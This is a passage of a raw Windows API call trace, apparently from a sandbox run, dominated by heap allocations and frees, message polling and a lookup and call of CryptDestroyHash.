HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0147.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0147.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0147.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0147.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0147.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0147.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0147.554] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0147.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0147.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0147.555] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0147.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0147.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0147.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509f8 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0147.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0147.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0147.557] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0147.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0147.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0147.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0147.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0147.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0147.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0147.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69ba8 [0147.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ba8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0147.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0147.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0147.560] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0147.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0147.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0147.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.560] CryptDestroyHash (hHash=0xa87290) returned 1 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0147.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0147.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0147.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0147.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0147.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0147.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0147.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0147.562] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0147.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0147.563] 